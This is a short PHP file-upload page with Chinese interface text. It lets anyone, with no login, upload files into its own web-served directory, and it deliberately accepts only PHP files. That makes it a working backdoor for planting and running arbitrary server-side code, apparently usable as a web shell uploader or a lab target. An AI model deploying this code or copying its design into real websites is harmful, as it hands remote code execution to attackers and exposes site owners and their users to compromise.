<?php
define("UPLOAD_DIR", "./");
define("MAX_FILE_SIZE", 5000000); // 5MB

if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
    $target_file = UPLOAD_DIR . basename($_FILES["fileToUpload"]["name"]);
    $uploadOk = true;
    $fileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

    // 检查文件大小
    if ($_FILES["fileToUpload"]["size"] > MAX_FILE_SIZE) {
        echo "抱歉，您的文件太大。";
        $uploadOk = false;
    }

    // 只允许上传 PHP 文件
    if ($fileType !== "php") {
        echo "抱歉，仅允许上传 PHP 文件。";
        $uploadOk = false;
    }

    // 尝试上传文件
    if ($uploadOk) {
        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
            echo "文件已经被上传到: " . htmlspecialchars($target_file);
        } else {
            echo "抱歉，上传文件时发生错误。";
        }
    }
} else {
    // 显示上传表单
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>文件上传</title>
</head>
<body>
    <form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>" method="post" enctype="multipart/form-data">
        选择文件：
        <input type="file" name="fileToUpload" id="fileToUpload">
        <input type="submit" value="上传文件" name="submit">
    </form>
</body>
</html>

<?php
}
?>
